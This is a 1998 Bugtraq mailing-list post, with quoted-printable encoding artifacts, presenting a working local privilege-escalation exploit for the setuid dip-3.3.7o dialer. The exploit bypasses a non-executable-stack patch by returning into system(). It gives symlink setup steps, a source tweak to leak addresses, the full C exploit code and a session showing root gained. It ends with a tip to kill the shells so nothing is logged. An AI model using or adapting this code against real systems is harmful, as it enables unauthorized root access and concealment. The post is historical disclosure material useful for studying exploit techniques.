[6755] in bugtraq
Cooking with the right dip(-3.3.7o)
daemon@ATHENA.MIT.EDU (Thomas Troeger)
Tue May 12 19:06:55 1998
Date: Wed, 13 May 1998 00:17:35 +0200
Reply-To: Thomas Troeger <tstroege@CIP.INFORMATIK.UNI-ERLANGEN.DE>
From: Thomas Troeger <tstroege@CIP.INFORMATIK.UNI-ERLANGEN.DE>
To: BUGTRAQ@NETSPACE.ORG
Hi,
After reading jamez's and zef's postings about dip and reviewing
its sourcecode, I recalled Rafal Wojtczuk (nergal)'s post about defeati=
ng
Solar Designer's non-executable stack. I asked myself "Hmmm, let's see =
if
we can get a shell out of it even on a system with installed stackpatch=
."
So I develpoed the following recipe:
First, setup your directory like this:
-----------------------------------------------------------
ln -s /bin/sh a
ln -s /bin/sh aa
ln -s /bin/sh aaa
ln -s /bin/sh aaaa
ln -s /bin/sh aaaaa
ln -s /bin/sh aaaaaa
ln -s /bin/sh aaaaaaa
ln -s /usr/sbin/dip vul
-----------------------------------------------------------
Get the dip-3.3.7o-uri package and uncompress it. Take main.c and edit
it the following (preferably with vi !! :) ) :
------------------ dip-3.3.7o/main.c line 194+ ------------------------=
-----
fp =3D fopen(buf, "r");
if (fp =3D=3D (FILE *)0) {
fprintf(stderr, "DIP: cannot open %s: %s\n",
buf, strerror(errno));
+ fprintf(stderr, "labels: %p %p\n", &system, nam);
return;
}
-----------------------------------------------------------------------=
-----
Of course you can juat use gdb and issue the "p system" command as well=
, that
avoids getting the package.
Now compile and run it, you get:
-----------------------------------------------------------------------=
-----
pigsnspace$ dip -k -l aaaa
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open /usr/spool/uucp/LCK..aaaa: No such file or directory
labels: 0x80493e8 0xbffff6f0
-----------------------------------------------------------------------=
-----
Insert the first number you get into the following exploit:
-------------------------- baguette.c -------------------------------=
-
/*
* Programm to get a shell from dip-3.3.7o-uri on a system with
* Solar Designer's stackpatch installed.
* by tstroege@cip.informatik.uni-erlangen.de
* credits to jamez, zef and especially
* Rafal Wojtczuk for his howto ;)
*
* Of course this is just for educational purposes :)
*/
#include <stdio.h>
#define SYSTEM 0x80493e8
/* address of system entry */
#define SOMESTACK 0xbffffea0
/* adress on stack where argv[1] should be. Usually somewhere on top */
int main(int argc, char *argv[]) {
char *name[]=3D{"./vul", "-k", "-l", NULL, NULL};
char mem[1024], *ptr;
int i, code[]=3D{ SYSTEM, SOMESTACK, SOMESTACK, 0 }, off=3Datoi=
(argv[1]);
for (ptr=3Dmem, i=3D0; i < 1024; i+=3D8, ptr+=3D8) memcpy(ptr, =
"aaaaaaa;", 8);
ptr=3Dmem+off;
strcpy(ptr, (char *)&(code[0]));
mem[1023]=3D0;
name[3]=3D(char *)mem;
printf("%s (%d/%d)\n", mem, strlen(mem), off);
execve(name[0], name, NULL);
return 0;
}
----------------------------------------------------------------------
(SOMESTACK is someway above 0xbffff6f0, here it was 0xbffffea0)
Running this program should do. On my platform offset 113 did the job:
----------------------------------------------------------------------
pigsnspace$ gcc baguette.c -o exp
pigsnspace$ id
uid=3D1047(piggy) gid=3D100(users) groups=3D100(users)
pigsnspace$ ./exp 113
aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa=
;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;a=E8 =FE=FF=BF =FE=FF=BF (125/=
113)
DIP: Dialup IP Protocol Driver version 3.3.7o-uri (8 Feb 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open /var/lock/LCK..aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa=
;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaaa;aaaaaa=
a;a=E8 =FE=FF=BF =FE=FF=BF: No such file or directory
pigsnspace# id
uid=3D1047(piggy) gid=3D100(users) euid=3D0(root) groups=3D100(users)
----------------------------------------------------------------------
Well, so much to this. You should keep in mind that getting the right o=
ffset
value (the 113 somewhere above) and the address of SYSTEM and SOMESTACK=
can
be difficult. Most probably this program will not work at once (see mor=
e about
it in nergals article). Those values worked here, but you will have to
experiment.
After exiting the neat shells, you'll get a systerm log. So you should
maybe just kill them using kill ......
tst.
